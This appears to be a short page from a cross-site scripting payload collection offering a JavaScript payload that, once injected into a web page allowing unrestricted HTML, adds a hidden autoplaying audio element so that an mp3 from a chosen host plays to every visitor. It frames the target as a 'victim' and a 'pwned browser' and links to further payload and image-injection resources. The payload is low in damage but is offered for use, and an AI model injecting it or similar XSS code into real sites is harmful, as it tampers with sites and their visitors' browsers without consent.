Play Music HTML5 Audio XSS Payload

Play Music HTML5 Audio XSS Payload

The script below allows you to share your favorite mp3 through your target browser.

Let’s assume the XSS payload was injected into a web page that supports unrestricted HTML an mp3 audio file would then play to the visitors of the compromised web page.

if(document.getElementById('xss_audio') == null ) {
var a = document.createElement('audio');
a.src = &quot;http://127.0.0.1/music/LesRatsQuittentLeNavire.mp3&quot;
a.autoplay=true;
a.id='xss_audio';
a.style.display='none';
document.body.appendChild(a);
}

A simple script that uses html5 audio tag to share your favorite MP3 with the victim.

XSS Payload to share your favorite music direct from a pwned browser.

Author: Renaud Bidou

http://www.xss-payloads.com/payloads/scripts/playmusic.js.html

Injecting XSS Payloads into an image

https://hackingvision.com/2017/04/08/exploit-xss-image-force-download/